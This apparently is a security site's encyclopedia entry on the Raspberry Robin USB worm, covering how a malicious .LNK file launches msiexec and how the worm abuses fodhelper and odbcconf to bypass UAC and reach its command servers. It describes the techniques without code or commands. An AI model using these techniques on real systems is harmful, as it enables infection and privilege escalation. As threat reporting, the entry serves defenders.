Home / malwarePDF  

Raspberry Robin

First posted on 05 July 2022.
Source: SecurityHome

Aliases :

There are no other names known for Raspberry Robin.

Explanation :

The malware, dubbed Raspberry Robin, spreads via infected USB devices, and it was first spotted in September 2021 by Red Canary intelligence analysts.

Cybersecurity firm Sekoia also observed it using QNAP NAS devices as command and control servers (C2) servers in early November, while Microsoft said it found malicious artifacts linked to this worm created in 2019.

Although Microsoft observed the malware connecting to addresses on the Tor network, the threat actors are yet to exploit the access they gained to their victims' networks.

This is in spite of the fact that they could easily escalate their attacks given that the malware can bypass User Account Control (UAC) on infected systems using legitimate Windows tools.

Raspberry Robin is spreading to new Windows systems via infected USB drives containing a malicious .LNK file.

Once the USB device is attached and the user clicks the link, the worm spawns a msiexec process using cmd.exe to launch a malicious file stored on the infected drive.

It infects new Windows devices, communicates with its command and control servers (C2), and executes malicious payloads using several legitimate Windows utilities:

  • fodhelper (a trusted binary for managing features in Windows settings)

  • msiexec (command line Windows Installer component),

  • and odbcconf (a tool for configuring ODBC drivers).

While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware, Red Canary researchers explained.

Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.

Security researchers who spotted Raspberry Robin in the wild are yet to attribute the malware to a threat group and are still working on finding its operators' end goal.

However, Microsoft has tagged this campaign as high-risk, given that the attackers could download and deploy additional malware within the victims' networks and escalate their privileges at any time.

Last update 05 July 2022